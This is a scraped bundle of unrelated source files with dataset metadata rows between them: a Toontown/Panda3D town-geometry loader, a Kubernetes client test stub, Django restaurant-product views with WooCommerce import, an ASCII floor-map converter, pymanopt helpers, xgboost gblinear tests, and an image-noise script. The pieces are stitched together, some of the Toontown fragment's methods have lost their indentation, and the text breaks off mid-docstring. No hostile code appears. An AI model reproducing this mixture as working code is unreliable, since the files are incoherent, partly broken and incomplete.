        self.geom.setName('town_top_level')
def reparentLandmarkBlockNodes(self):
bucket = self.landmarkBlocks = hidden.attachNewNode('landmarkBlocks')
npc = self.geom.findAllMatches('**/sb*:*_landmark_*_DNARoot')
for i in range(npc.getNumPaths()):
nodePath = npc.getPath(i)
nodePath.wrtReparentTo(bucket)
npc = self.geom.findAllMatches('**/sb*:*animated_building*_DNARoot')
for i in range(npc.getNumPaths()):
nodePath = npc.getPath(i)
nodePath.wrtReparentTo(bucket)
    def makeDictionaries(self, dnaStore):
        """Build the vis-group bookkeeping used for zone visibility.

        Produces:
          nodeDict   - zoneId -> list of visible group NodePaths
          zoneDict   - zoneId -> that zone's own group NodePath
          node2zone  - reverse of zoneDict (astron servers only)
          nodeList   - all group NodePaths in visgroup order
          fadeIn/OutDict - per-group fade Sequences for zone transitions
        """
        self.nodeDict = {}
        self.zoneDict = {}
        if base.cr.astronSupport:
            self.node2zone = {}
        self.nodeList = []
        self.fadeInDict = {}
        self.fadeOutDict = {}
        # Fully opaque / fully transparent color scales for the fades.
        a1 = Vec4(1, 1, 1, 1)
        a0 = Vec4(1, 1, 1, 0)
        numVisGroups = dnaStore.getNumDNAVisGroups()
        # Pass 1: find each visgroup's node and build the fade intervals.
        for i in range(numVisGroups):
            groupFullName = dnaStore.getDNAVisGroupName(i)
            groupName = base.cr.hoodMgr.extractGroupName(groupFullName)
            zoneId = int(groupName)
            # Map the canonical zone onto this hood instance's zone range.
            zoneId = ZoneUtil.getTrueZoneId(zoneId, self.zoneId)
            groupNode = self.geom.find('**/' + groupFullName)
            if groupNode.isEmpty():
                self.notify.error('Could not find visgroup')
            else:
                # Rename the node after its true zone id (keeping any
                # ':suffix' from the original group name).
                if ':' in groupName:
                    groupName = '%s%s' % (zoneId, groupName[groupName.index(':'):])
                else:
                    groupName = '%s' % zoneId
                groupNode.setName(groupName)
            self.nodeDict[zoneId] = []
            self.nodeList.append(groupNode)
            self.zoneDict[zoneId] = groupNode
            if base.cr.astronSupport:
                self.node2zone[groupNode] = zoneId
            fadeDuration = 0.5
            # Fade-out ends stashed; fade-in starts by unstashing.
            self.fadeOutDict[groupNode] = Sequence(Func(groupNode.setTransparency, 1), LerpColorScaleInterval(groupNode, fadeDuration, a0, startColorScale=a1), Func(groupNode.clearColorScale), Func(groupNode.clearTransparency), Func(groupNode.stash), name='fadeZone-' + str(zoneId), autoPause=1)
            self.fadeInDict[groupNode] = Sequence(Func(groupNode.unstash), Func(groupNode.setTransparency, 1), LerpColorScaleInterval(groupNode, fadeDuration, a1, startColorScale=a0), Func(groupNode.clearColorScale), Func(groupNode.clearTransparency), name='fadeZone-' + str(zoneId), autoPause=1)

        # Pass 2: record, for each zone, which other zones' nodes must be
        # visible while the toon stands in it.
        for i in range(numVisGroups):
            groupFullName = dnaStore.getDNAVisGroupName(i)
            zoneId = int(base.cr.hoodMgr.extractGroupName(groupFullName))
            zoneId = ZoneUtil.getTrueZoneId(zoneId, self.zoneId)
            for j in range(dnaStore.getNumVisiblesInDNAVisGroup(i)):
                visName = dnaStore.getVisibleName(i, j)
                groupName = base.cr.hoodMgr.extractGroupName(visName)
                nextZoneId = int(groupName)
                nextZoneId = ZoneUtil.getTrueZoneId(nextZoneId, self.zoneId)
                visNode = self.zoneDict[nextZoneId]
                self.nodeDict[zoneId].append(visNode)

        # The store's own copies are no longer needed.
        self.hood.dnaStore.resetPlaceNodes()
        self.hood.dnaStore.resetDNAGroups()
        self.hood.dnaStore.resetDNAVisGroups()
        self.hood.dnaStore.resetDNAVisGroupsAI()
def renameFloorPolys(self, nodeList):
for i in nodeList:
collNodePaths = i.findAllMatches('**/+CollisionNode')
numCollNodePaths = collNodePaths.getNumPaths()
visGroupName = i.node().getName()
for j in range(numCollNodePaths):
collNodePath = collNodePaths.getPath(j)
bitMask = collNodePath.node().getIntoCollideMask()
if bitMask.getBit(1):
collNodePath.node().setName(visGroupName)
def createAnimatedProps(self, nodeList):
    """Scan the zone geometry for prop marker nodes and instantiate them.

    Three marker families are recognised under each node of nodeList:
      * ``animated_prop_*``   -> an animated-prop class from toontown.hood
      * ``interactive_prop_*``-> an interactive prop (hydrant/trashcan/mailbox
                                 get specialised classes)
      * ``*:animated_building_*`` (except ``sb``-prefixed) -> animated building
    Populates self.animPropDict (zone node -> list of prop objects) and
    self.zoneIdToInteractivePropDict (zoneId -> the cell-index-0 prop).
    """
    self.animPropDict = {}
    self.zoneIdToInteractivePropDict = {}
    for i in nodeList:
        animPropNodes = i.findAllMatches('**/animated_prop_*')
        numAnimPropNodes = animPropNodes.getNumPaths()
        for j in range(numAnimPropNodes):
            animPropNode = animPropNodes.getPath(j)
            # Derive the prop class name from the node-name convention.
            if animPropNode.getName().startswith('animated_prop_generic'):
                className = 'GenericAnimatedProp'
            elif animPropNode.getName().startswith('animated_prop_'):
                # animated_prop_<ClassName>_...: first underscore token names it
                name = animPropNode.getName()[len('animated_prop_'):]
                splits = name.split('_')
                className = splits[0]
            else:
                # Legacy naming: class name embedded mid-string.
                className = animPropNode.getName()[14:-8]
            # Import the class lazily from toontown.hood and instantiate it.
            symbols = {}
            base.cr.importModule(symbols, 'toontown.hood', [className])
            classObj = getattr(symbols[className], className)
            animPropObj = classObj(animPropNode)
            animPropList = self.animPropDict.setdefault(i, [])
            animPropList.append(animPropObj)
        interactivePropNodes = i.findAllMatches('**/interactive_prop_*')
        numInteractivePropNodes = interactivePropNodes.getNumPaths()
        for j in range(numInteractivePropNodes):
            interactivePropNode = interactivePropNodes.getPath(j)
            className = 'InteractiveAnimatedProp'
            if 'hydrant' in interactivePropNode.getName():
                className = 'HydrantInteractiveProp'
            elif 'trashcan' in interactivePropNode.getName():
                className = 'TrashcanInteractiveProp'
            elif 'mailbox' in interactivePropNode.getName():
                className = 'MailboxInteractiveProp'
            symbols = {}
            base.cr.importModule(symbols, 'toontown.hood', [className])
            classObj = getattr(symbols[className], className)
            interactivePropObj = classObj(interactivePropNode)
            animPropList = self.animPropDict.get(i)
            if animPropList is None:
                animPropList = self.animPropDict.setdefault(i, [])
            animPropList.append(interactivePropObj)
            # Cell index 0 marks the zone's primary interactive prop; at most
            # one per zone is allowed.
            if interactivePropObj.getCellIndex() == 0:
                zoneId = int(i.getName())
                if zoneId not in self.zoneIdToInteractivePropDict:
                    self.zoneIdToInteractivePropDict[zoneId] = interactivePropObj
                else:
                    self.notify.error('already have interactive prop %s in zone %s' % (self.zoneIdToInteractivePropDict, zoneId))
        animatedBuildingNodes = i.findAllMatches('**/*:animated_building_*;-h')
        # 'sb'-prefixed nodes are excluded from the animated-building set.
        for np in animatedBuildingNodes:
            if np.getName().startswith('sb'):
                animatedBuildingNodes.removePath(np)
        numAnimatedBuildingNodes = animatedBuildingNodes.getNumPaths()
        for j in range(numAnimatedBuildingNodes):
            animatedBuildingNode = animatedBuildingNodes.getPath(j)
            className = 'GenericAnimatedBuilding'
            symbols = {}
            base.cr.importModule(symbols, 'toontown.hood', [className])
            classObj = getattr(symbols[className], className)
            animatedBuildingObj = classObj(animatedBuildingNode)
            animPropList = self.animPropDict.get(i)
            if animPropList is None:
                animPropList = self.animPropDict.setdefault(i, [])
            animPropList.append(animatedBuildingObj)
    return
def deleteAnimatedProps(self):
    """Tear down every prop created by createAnimatedProps and drop the registry."""
    for propList in self.animPropDict.values():
        for prop in propList:
            prop.delete()
    del self.animPropDict
def enterAnimatedProps(self, zoneNode):
    """Activate all props registered under zoneNode (no-op when none exist)."""
    props = self.animPropDict.get(zoneNode, ())
    for prop in props:
        prop.enter()
def exitAnimatedProps(self, zoneNode):
    """Deactivate all props registered under zoneNode (no-op when none exist)."""
    props = self.animPropDict.get(zoneNode, ())
    for prop in props:
        prop.exit()
def getInteractiveProp(self, zoneId):
    """Return the interactive prop registered for zoneId, or None if absent."""
    return self.zoneIdToInteractivePropDict.get(zoneId)
| 43.297368 | 296 | 0.642436 |
cd28c675fcee3b17d75eab6f42f691a9b69ac45e | 1,124 | py | Python | kubernetes/test/test_v1alpha1_initializer_configuration_list.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 1 | 2018-10-20T19:37:57.000Z | 2018-10-20T19:37:57.000Z | kubernetes/test/test_v1alpha1_initializer_configuration_list.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | null | null | null | kubernetes/test/test_v1alpha1_initializer_configuration_list.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 2 | 2018-07-27T19:39:34.000Z | 2020-12-25T02:48:27.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.11.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import kubernetes.client
from kubernetes.client.rest import ApiException
from kubernetes.client.models.v1alpha1_initializer_configuration_list import V1alpha1InitializerConfigurationList
class TestV1alpha1InitializerConfigurationList(unittest.TestCase):
    """Unit-test stubs for the V1alpha1InitializerConfigurationList model."""

    def setUp(self):
        # No fixtures are needed for the stub.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testV1alpha1InitializerConfigurationList(self):
        """Placeholder test for V1alpha1InitializerConfigurationList.

        FIXME: construct the object with its mandatory attributes set to
        example values, e.g.::

            model = kubernetes.client.models.v1alpha1_initializer_configuration_list.V1alpha1InitializerConfigurationList()
        """
        pass
if __name__ == '__main__':
    # Allow running this test module directly from the command line.
    unittest.main()
| 24.977778 | 120 | 0.75089 |
0c8c53ab65a9dd249925f4f1d5a3e51e82239b86 | 10,279 | py | Python | products/views.py | tiagocordeiro/gomenu | b5cbf7edb52a88828815c7865f7870eb5a4b303a | [
"MIT"
] | 4 | 2020-08-13T12:07:33.000Z | 2022-02-20T11:18:54.000Z | products/views.py | tiagocordeiro/gomenu | b5cbf7edb52a88828815c7865f7870eb5a4b303a | [
"MIT"
] | 246 | 2020-06-30T14:28:22.000Z | 2022-03-27T14:51:58.000Z | products/views.py | tiagocordeiro/gomenu | b5cbf7edb52a88828815c7865f7870eb5a4b303a | [
"MIT"
] | 1 | 2020-08-13T12:06:50.000Z | 2020-08-13T12:06:50.000Z | from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.forms import inlineformset_factory
from django.http import JsonResponse
from django.shortcuts import render, redirect, get_object_or_404
from django.views.decorators.http import require_POST
from products.facade import get_product, get_from_category
from products.forms import CategoryForm, ProductVariationForm, ProductForm
from products.models import Category, Product, ProductVariation
from restaurants.models import Restaurant, RestaurantIntegrations
@login_required
def categories_list(request):
    """List the categories belonging to the logged-in manager's restaurant."""
    # Members of the "Customer" group have no backoffice access.
    is_customer = request.user.groups.filter(name="Customer").exists()
    if is_customer:
        messages.warning(request, "Você não pode acessar essa página")
        return redirect('orders_list')
    owned_categories = Category.objects.filter(restaurant__manager=request.user)
    return render(request, 'products/list_categories.html',
                  {'categories': owned_categories})
@login_required
def category_new(request):
    """Create a new Category attached to the logged-in manager's restaurant.

    Customers are bounced to their order list; managers without a
    restaurant are sent to the restaurant-creation page first.
    """
    if request.user.groups.filter(name="Customer").exists():
        messages.warning(request, "Você não pode acessar essa página")
        return redirect('orders_list')
    try:
        restaurant = Restaurant.objects.get(manager=request.user)
    except Restaurant.DoesNotExist:
        messages.warning(request, "Você precisa cadastrar um restaurante")
        return redirect('new_restaurant')
    if request.method == "POST":
        form = CategoryForm(request.POST)
        if form.is_valid():
            # commit=False so the owning restaurant can be set before saving.
            category = form.save(commit=False)
            category.restaurant = restaurant
            category.save()
            messages.success(request, "Nova categoria cadastrada.")
            return redirect(categories_list)
    else:
        form = CategoryForm()
    return render(request, 'products/category_new.html', {'form': form})
@login_required
def category_update(request, pk):
    """Edit an existing Category.

    Only a superuser or the manager of the category's restaurant may edit;
    everyone else is redirected to the dashboard.

    NOTE(review): unlike every other view in this module, this view was
    missing @login_required, letting anonymous users reach the ownership
    check below; the decorator is added for consistency and safety.
    """
    category = get_object_or_404(Category, pk=pk)
    if request.user.is_superuser or request.user == category.restaurant.manager:
        pass
    else:
        messages.warning(request, "Você não tem permissão.")
        return redirect('dashboard')
    if request.method == 'POST':
        form = CategoryForm(request.POST, instance=category)
        try:
            if form.is_valid():
                form.save()
                messages.success(request, "Categoria atualizada")
                return redirect('category_update', pk=pk)
        except Exception as e:
            # Surface unexpected save errors to the user instead of a 500.
            messages.warning(request,
                             'Ocorreu um erro ao atualizar: {}'.format(e))
    else:
        form = CategoryForm(instance=category)
    return render(request, 'products/category_update.html', {'form': form})
@login_required
def products_list(request):
    """List the manager's products, split into simple and variation products."""
    if request.user.groups.filter(name="Customer").exists():
        messages.warning(request, "Você não pode acessar essa página")
        return redirect('orders_list')
    products = Product.objects.all().order_by('category__name', 'name').filter(
        restaurant__manager=request.user)
    # Products with no ProductVariation rows are "simple" products.
    simple_products = products.filter(productvariation__isnull=True)
    variation_products = ProductVariation.objects.all().filter(
        product__restaurant__manager=request.user)
    context = {
        'simple_products': simple_products,
        'variation_products': variation_products,
    }
    return render(request, 'products/list_products.html', context=context)
@login_required
def products_sort(request, category=None):
    """Render the product-ordering page, optionally filtered to one category."""
    if category is None:
        products = Product.objects.all().order_by('order', 'category__name', 'name').filter(
            restaurant__manager=request.user)
    else:
        products = Product.objects.all().order_by('order', 'category__name', 'name').filter(
            restaurant__manager=request.user, category=category)
    context = {'products': products,
               'category': category}
    return render(request, 'products/sort_products.html', context=context)
@login_required
@require_POST
def save_new_ordering(request):
    """Persist the product order posted by the sort page.

    POST fields:
      * ordering       - comma-separated product PKs in the desired order
      * categoryfilter - the page's category filter (the string "None"
                         when unfiltered), echoed back into the redirect
    """
    ordered_ids = request.POST["ordering"]
    category = request.POST["categoryfilter"]
    if len(ordered_ids) < 1:
        messages.success(request, "Nenhum produto para atualizar")
        return redirect('products_sort')
    # Orders advance in steps of 10 so items can later be inserted between
    # two products without renumbering everything.
    current_order = 10
    for lookup_id in ordered_ids.split(","):
        product = Product.objects.get(pk=lookup_id)
        product.order = current_order
        product.save()
        current_order += 10
    messages.success(request, "Ordem de produtos atualizada.")
    if category == "None":
        return redirect('products_sort')
    return redirect('products_sort', category)
@login_required
def product_new(request):
    """Create a Product plus its inline ProductVariation rows in one form."""
    if request.user.groups.filter(name="Customer").exists():
        messages.warning(request, "Você não pode acessar essa página")
        return redirect('orders_list')
    try:
        restaurant = Restaurant.objects.get(manager=request.user)
    except Restaurant.DoesNotExist:
        messages.warning(request, "Você precisa cadastrar um restaurante")
        return redirect('new_restaurant')
    product_form = Product()
    variations_formset = inlineformset_factory(Product, ProductVariation,
                                               form=ProductVariationForm,
                                               extra=1)
    if request.method == "POST":
        form = ProductForm(request.POST, instance=product_form, prefix='main')
        # Limit category choices to the manager's own categories.
        form.fields["category"].queryset = Category.objects.filter(
            restaurant__manager=request.user)
        formset = variations_formset(request.POST, instance=product_form,
                                     prefix='product')
        if form.is_valid() and formset.is_valid():
            # commit=False so the owning restaurant can be set before saving.
            novo_produto = form.save(commit=False)
            novo_produto.restaurant = restaurant
            novo_produto.save()
            formset.save()
            messages.success(request, "Novo produto cadastrado.")
            return redirect(products_list)
    else:
        form = ProductForm(instance=product_form, prefix='main')
        form.fields["category"].queryset = Category.objects.filter(
            restaurant__manager=request.user)
        formset = variations_formset(instance=product_form, prefix='product')
    return render(request, 'products/product_new.html', {'form': form,
                                                         'formset': formset})
@login_required
def product_update(request, pk):
    """Edit a Product and its inline variations.

    Only a superuser or the manager of the product's restaurant may edit.
    """
    product = get_object_or_404(Product, pk=pk)
    if request.user.is_superuser or request.user == product.restaurant.manager:
        pass
    else:
        messages.warning(request, "Você não tem permissão.")
        return redirect('dashboard')
    variations_formset = inlineformset_factory(Product, ProductVariation,
                                               form=ProductVariationForm,
                                               extra=1)
    if request.method == 'POST':
        form = ProductForm(request.POST, instance=product, prefix='main')
        formset = variations_formset(request.POST, instance=product,
                                     prefix='product')
        try:
            if form.is_valid() and formset.is_valid():
                form.save()
                formset.save()
                messages.success(request, "Produto atualizado")
                return redirect('product_update', pk=pk)
        except Exception as e:
            # Surface unexpected save errors to the user instead of a 500.
            messages.warning(request,
                             'Ocorreu um erro ao atualizar: {}'.format(e))
    else:
        form = ProductForm(instance=product, prefix='main')
        formset = variations_formset(instance=product, prefix='product')
    return render(request, 'products/product_update.html', {'form': form,
                                                            'formset': formset, })
@login_required
def import_from_woocommerce(request, product_id):
    """Fetch one product from the restaurant's WooCommerce shop as JSON.

    Requires the restaurant to have a RestaurantIntegrations row with
    WooCommerce credentials; otherwise the user is sent to the dashboard.
    """
    if request.user.groups.filter(name="Customer").exists():
        messages.warning(request, "Você não pode acessar essa página")
        return redirect('orders_list')
    try:
        restaurant = Restaurant.objects.get(manager=request.user)
    except Restaurant.DoesNotExist:
        messages.warning(request, "Você precisa cadastrar um restaurante")
        return redirect('new_restaurant')
    try:
        woo_integration_data = restaurant.restaurantintegrations_set
        consumer_key = woo_integration_data.get().wc_consumer_key
        consumer_secret = woo_integration_data.get().wc_consumer_secret
        woo_commerce_url = woo_integration_data.get().woo_commerce_url
    except RestaurantIntegrations.DoesNotExist:
        messages.warning(request, "Solicite a integração para o suporte")
        return redirect('dashboard')
    product = get_product(product_id=product_id,
                          consumer_key=consumer_key,
                          consumer_secret=consumer_secret,
                          woo_commerce_url=woo_commerce_url)
    # get_product returns a response-like object; relay its JSON payload.
    return JsonResponse(product.json())
@login_required
def import_all_from_woocommerce_category(request, category_id):
    """Import every product of a WooCommerce category and return them as JSON.

    Same access rules and integration requirements as
    import_from_woocommerce.
    """
    if request.user.groups.filter(name="Customer").exists():
        messages.warning(request, "Você não pode acessar essa página")
        return redirect('orders_list')
    try:
        restaurant = Restaurant.objects.get(manager=request.user)
    except Restaurant.DoesNotExist:
        messages.warning(request, "Você precisa cadastrar um restaurante")
        return redirect('new_restaurant')
    try:
        woo_integration_data = restaurant.restaurantintegrations_set
        consumer_key = woo_integration_data.get().wc_consumer_key
        consumer_secret = woo_integration_data.get().wc_consumer_secret
        woo_commerce_url = woo_integration_data.get().woo_commerce_url
    except RestaurantIntegrations.DoesNotExist:
        messages.warning(request, "Solicite a integração para o suporte")
        return redirect('dashboard')
    products = get_from_category(category_id, restaurant=restaurant,
                                 consumer_key=consumer_key,
                                 consumer_secret=consumer_secret,
                                 woo_commerce_url=woo_commerce_url)
    return JsonResponse(products)
| 37.652015 | 92 | 0.662321 |
66e2834200e3ca0ae61b80e17c25d56186bc1f94 | 2,053 | py | Python | go-convert-v2.py | muzudho/ascii-based-floor-map-to-csv | b43f808a24358b3a9da5bb74bf4b5e8155ab752a | [
"MIT"
] | null | null | null | go-convert-v2.py | muzudho/ascii-based-floor-map-to-csv | b43f808a24358b3a9da5bb74bf4b5e8155ab752a | [
"MIT"
] | null | null | null | go-convert-v2.py | muzudho/ascii-based-floor-map-to-csv | b43f808a24358b3a9da5bb74bf4b5e8155ab752a | [
"MIT"
] | null | null | null | #
#
# Note.
#
# Root directory: Visual studio code workspace root.
#
block_input_file = "./ascii-floor-map-to-csv/data/block-map.txt"
table_input_file = "./ascii-floor-map-to-csv/data/table-number-map.txt"
output_file_name = "./ascii-floor-map-to-csv/auto-generated/floor-map.csv"

try:
    # Context managers guarantee the handles are closed even on error.  The
    # previous nested try/finally called .close() on names that were never
    # bound when the open() itself failed, raising a NameError that masked
    # the real exception.
    with open(block_input_file) as bl_file, \
            open(table_input_file) as ta_file, \
            open(output_file_name, 'w', encoding='utf-8') as out_file:
        # Column name, No space.
        out_file.write("ID,X,Y,BLOCK\n")

        id_column = []
        x_column = []
        y_column = []
        block_column = []

        # Every non-empty cell ('.' is empty) of the block map is one desk.
        for y, line in enumerate(bl_file.readlines()):
            for x, block in enumerate(line):
                if block != '.' and block != '\n':
                    x_column.append(x)
                    y_column.append(y)
                    block_column.append(block)

        # The table-number map supplies the matching IDs (non-zero cells).
        for row in ta_file.readlines():
            for number_text in row.split(","):
                num = int(number_text)
                if num != 0:
                    id_column.append(num)

        # Report the column sizes, based on the number of desks.
        print("len(id_column ):{}".format(len(id_column)))
        print("len(x_column ):{}".format(len(x_column)))
        print("len(y_column ):{}".format(len(y_column)))
        print("len(block_column):{}".format(len(block_column)))

        for i, block in enumerate(block_column):
            out_file.write("{},{},{},{}\n".format(
                id_column[i], x_column[i], y_column[i], block))
except Exception as e:
    print(e)
print("Info : Finished.")
| 31.106061 | 74 | 0.512421 |
fff81170fef1dd1a1e1cfe94a912a5e9ae529aff | 3,297 | py | Python | pymanopt/tools/__init__.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | pymanopt/tools/__init__.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | pymanopt/tools/__init__.py | paulroujansky/pymanopt | 7ec0f83b2cc1bf325bfbbc98d69188cf6b7ef0f1 | [
"BSD-3-Clause"
] | null | null | null | import collections
import functools
def make_enum(name, fields):
    """Build a poor-man's enum: a namedtuple instance whose value for each
    field is that field's index (0, 1, 2, ...)."""
    enum_cls = collections.namedtuple(name, fields)
    return enum_cls(*range(len(fields)))
class ndarraySequenceMixin:
    """Mixin that stops numpy from broadcasting over sequences of arrays."""
    # The following attributes ensure that operations on sequences of
    # np.ndarrays with scalar numpy data types such as np.float64 don't attempt
    # to vectorize the scalar variable. Refer to
    #
    #     https://docs.scipy.org/doc/numpy/reference/arrays.classes.html
    #     https://github.com/pymanopt/pymanopt/issues/49
    #
    # for details.
    __array_priority__ = 1000
    __array_ufunc__ = None  # Available since numpy 1.13
def _flatten_arguments_from_signature(arguments, signature):
flattened_arguments = []
for i, group in enumerate(signature):
if isinstance(group, (list, tuple)):
flattened_arguments.extend(arguments[i])
else:
flattened_arguments.append(arguments[i])
return tuple(flattened_arguments)
def flatten_arguments(arguments, signature=None):
    """Return a flat tuple of arguments from a possibly nested sequence.

    ``flatten_arguments([(1, 2), 3])`` yields ``(1, 2, 3)``.  When the
    nesting cannot be inferred from the element types, pass ``signature``
    (see ``_flatten_arguments_from_signature``) instead.
    """
    if signature is not None:
        return _flatten_arguments_from_signature(arguments, signature)
    flat = []
    for argument in arguments:
        group = argument if isinstance(argument, (list, tuple)) else (argument,)
        flat.extend(group)
    return tuple(flat)
def unpack_arguments(function, signature=None):
    """Wrap ``function`` so it accepts one packed sequence of arguments.

    The wrapper flattens the sequence (optionally guided by ``signature``,
    a nesting description such as ``(("x", "y"), "z")``) and calls
    ``function`` with the unpacked values.
    """
    @functools.wraps(function)
    def wrapper(packed_arguments):
        flat = flatten_arguments(packed_arguments, signature=signature)
        return function(*flat)
    return wrapper
def group_return_values(function, signature):
    """Wrap ``function`` so its flat return tuple is regrouped per ``signature``.

    List/tuple entries of ``signature`` become tuples of consecutive return
    values; scalar entries pass a single value through.  A unary signature
    returns the function's result unchanged.
    """
    if len(signature) == 1:
        @functools.wraps(function)
        def passthrough(*args):
            return function(*args)
        return passthrough

    sizes = [len(entry) if isinstance(entry, (list, tuple)) else 1
             for entry in signature]

    @functools.wraps(function)
    def wrapper(*args):
        values = function(*args)
        grouped = []
        offset = 0
        for size in sizes:
            if size == 1:
                grouped.append(values[offset])
            else:
                grouped.append(values[offset:offset + size])
            offset += size
        return grouped
    return wrapper
| 34.34375 | 79 | 0.664847 |
2ea3e44dd42e146b8ad4b0d7c94df413e9dd7cc1 | 3,447 | py | Python | tests/python/test_linear.py | lfdmn/xgboost | 9150fdbd4d989767f7126c589f773649a594dbc3 | [
"Apache-2.0"
] | null | null | null | tests/python/test_linear.py | lfdmn/xgboost | 9150fdbd4d989767f7126c589f773649a594dbc3 | [
"Apache-2.0"
] | 1 | 2022-02-01T16:14:41.000Z | 2022-02-01T16:14:41.000Z | tests/python/test_linear.py | lfdmn/xgboost | 9150fdbd4d989767f7126c589f773649a594dbc3 | [
"Apache-2.0"
] | null | null | null | import testing as tm
from hypothesis import strategies, given, settings, note
import xgboost as xgb
# Hypothesis strategy producing valid gblinear booster parameters.
parameter_strategy = strategies.fixed_dictionaries({
    'booster': strategies.just('gblinear'),
    'eta': strategies.floats(0.01, 0.25),
    'tolerance': strategies.floats(1e-5, 1e-2),
    'nthread': strategies.integers(1, 4),
})

# Additional parameters specific to the coordinate-descent updater.
coord_strategy = strategies.fixed_dictionaries({
    'feature_selector': strategies.sampled_from(['cyclic', 'shuffle',
                                                 'greedy', 'thrifty']),
    'top_k': strategies.integers(1, 10),
})
def train_result(param, dmat, num_rounds):
    """Train on ``dmat`` for ``num_rounds`` and return the eval history dict."""
    history = {}
    xgb.train(param, dmat, num_rounds, [(dmat, 'train')], verbose_eval=False,
              evals_result=history)
    return history
class TestLinear:
    """Property-based tests for the gblinear booster's updaters."""

    @given(parameter_strategy, strategies.integers(10, 50),
           tm.dataset_strategy, coord_strategy)
    @settings(deadline=None, print_blob=True)
    def test_coordinate(self, param, num_rounds, dataset, coord_param):
        # Unregularised coordinate descent should steadily reduce the
        # training metric (5e-4 tolerance for numerical noise).
        param['updater'] = 'coord_descent'
        param.update(coord_param)
        param = dataset.set_params(param)
        result = train_result(param, dataset.get_dmat(), num_rounds)['train'][dataset.metric]
        note(result)
        assert tm.non_increasing(result, 5e-4)

    # Loss is not guaranteed to always decrease because of regularisation parameters
    # We test a weaker condition that the loss has not increased between the first and last
    # iteration
    @given(parameter_strategy, strategies.integers(10, 50),
           tm.dataset_strategy, coord_strategy, strategies.floats(1e-5, 1.0),
           strategies.floats(1e-5, 1.0))
    @settings(deadline=None, print_blob=True)
    def test_coordinate_regularised(self, param, num_rounds, dataset, coord_param, alpha, lambd):
        param['updater'] = 'coord_descent'
        param['alpha'] = alpha
        param['lambda'] = lambd
        param.update(coord_param)
        param = dataset.set_params(param)
        result = train_result(param, dataset.get_dmat(), num_rounds)['train'][dataset.metric]
        note(result)
        assert tm.non_increasing([result[0], result[-1]])

    @given(parameter_strategy, strategies.integers(10, 50),
           tm.dataset_strategy)
    @settings(deadline=None, print_blob=True)
    def test_shotgun(self, param, num_rounds, dataset):
        param['updater'] = 'shotgun'
        param = dataset.set_params(param)
        result = train_result(param, dataset.get_dmat(), num_rounds)['train'][dataset.metric]
        note(result)
        # shotgun is non-deterministic, so we relax the test by only using first and last
        # iteration.
        if len(result) > 2:
            sampled_result = (result[0], result[-1])
        else:
            sampled_result = result
        assert tm.non_increasing(sampled_result)

    @given(parameter_strategy, strategies.integers(10, 50),
           tm.dataset_strategy, strategies.floats(1e-5, 1.0),
           strategies.floats(1e-5, 1.0))
    @settings(deadline=None, print_blob=True)
    def test_shotgun_regularised(self, param, num_rounds, dataset, alpha, lambd):
        param['updater'] = 'shotgun'
        param['alpha'] = alpha
        param['lambda'] = lambd
        param = dataset.set_params(param)
        result = train_result(param, dataset.get_dmat(), num_rounds)['train'][dataset.metric]
        note(result)
        assert tm.non_increasing([result[0], result[-1]])
| 41.53012 | 97 | 0.659994 |
57e6164f98fb4f53d2aa9e6e91f12266658b76fb | 1,137 | py | Python | setup.py | tumluliu/rap | 2a44b337379e32e7739aacd1425197c28adad9e9 | [
"MIT"
] | null | null | null | setup.py | tumluliu/rap | 2a44b337379e32e7739aacd1425197c28adad9e9 | [
"MIT"
] | null | null | null | setup.py | tumluliu/rap | 2a44b337379e32e7739aacd1425197c28adad9e9 | [
"MIT"
] | null | null | null | import re
from codecs import open

from setuptools import setup


def _read_metadata_field(field, text):
    """Extract ``__<field>__ = '...'`` from module source, or fail loudly.

    The previous copy-pasted regex blocks died with an opaque
    ``AttributeError: 'NoneType' object has no attribute 'group'`` when a
    field was missing; raise a descriptive error instead.
    """
    match = re.search(r'^__%s__\s*=\s*[\'"]([^\'"]*)[\'"]' % field,
                      text, re.MULTILINE)
    if match is None:
        raise RuntimeError(
            "Cannot find __%s__ in rap/__init__.py" % field)
    return match.group(1)


# All package metadata lives in rap/__init__.py as dunder constants.
with open('rap/__init__.py', 'r') as fd:
    file_content = fd.read()

version = _read_metadata_field('version', file_content)
license = _read_metadata_field('license', file_content)
title = _read_metadata_field('title', file_content)
author = _read_metadata_field('author', file_content)
contact = _read_metadata_field('contact', file_content)

setup(
    name=title,
    version=version,
    description="""Geospatial dataset exploration with Routers As Probes """,
    author=author,
    author_email=contact,
    license=license,
    packages=['rap'],
    entry_points={
        'console_scripts': [
            'rapy=rap.rapy:main'
        ]
    })
| 30.72973 | 78 | 0.525066 |
f75932eb992b566e7d07e4767d9068c74a653c1d | 4,891 | py | Python | codes/3_1.py | inspurer/ImageProcess | f826c36f3ae17bee5694c3f1748f9e5319a46fd9 | [
"MIT"
] | 1 | 2020-11-10T11:35:30.000Z | 2020-11-10T11:35:30.000Z | codes/3_1.py | inspurer/ImageProcess | f826c36f3ae17bee5694c3f1748f9e5319a46fd9 | [
"MIT"
] | null | null | null | codes/3_1.py | inspurer/ImageProcess | f826c36f3ae17bee5694c3f1748f9e5319a46fd9 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# pc_type lenovo
# create_time: 2019/11/9 15:15
# file_name: 3_1.py
import cv2
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import random
# Configure fonts so Chinese labels and the minus sign render correctly.
plt.rcParams['font.sans-serif'] = ['SimHei'] # default font (has Chinese glyphs)
plt.rcParams['axes.unicode_minus'] = False # keep '-' from rendering as a box in saved figures
sns.set_context("paper") # background
sns.set_style('whitegrid') # theme
sns.set(font='SimHei') # fix Chinese text in Seaborn; must come after the two lines above
def sp_noise(image, prob):
    """Return a copy of ``image`` corrupted with salt-and-pepper noise.

